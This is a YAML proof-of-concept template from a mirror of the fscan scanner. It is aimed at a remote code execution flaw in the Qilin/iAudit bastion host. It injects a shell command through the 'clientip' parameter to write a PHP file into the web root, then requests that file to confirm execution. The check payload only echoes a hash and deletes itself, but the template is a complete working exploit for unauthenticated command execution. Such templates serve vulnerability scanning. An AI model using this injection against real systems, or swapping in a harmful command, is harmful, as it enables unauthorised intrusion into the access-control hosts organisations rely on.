mirror of https://github.com/qwqdanchun/fscan.git
20 lines
677 B
YAML
20 lines
677 B
YAML
name: poc-yaml-qilin-bastion-host-rce
|
|
set:
|
|
r2: randomLowercase(10)
|
|
rules:
|
|
- method: GET
|
|
path: /get_luser_by_sshport.php?clientip=1;echo%20"<?php%20echo%20md5({{r2}});unlink(__FILE__);?>">/opt/freesvr/web/htdocs/freesvr/audit/{{r2}}.php;&clientport=1
|
|
follow_redirects: false
|
|
expression: response.status == 200
|
|
|
|
- method: GET
|
|
path: /{{r2}}.php
|
|
follow_redirects: false
|
|
expression: response.status == 200 && response.body.bcontains(bytes(md5(r2)))
|
|
|
|
detail:
|
|
author: For3stCo1d (https://github.com/For3stCo1d)
|
|
description: "iAudit-fortressaircraft-rce"
|
|
links:
|
|
- https://yun.scdsjzx.cn/system/notice/detail/399d2dd0-94aa-4914-a8f6-e71f8dc8ac87
|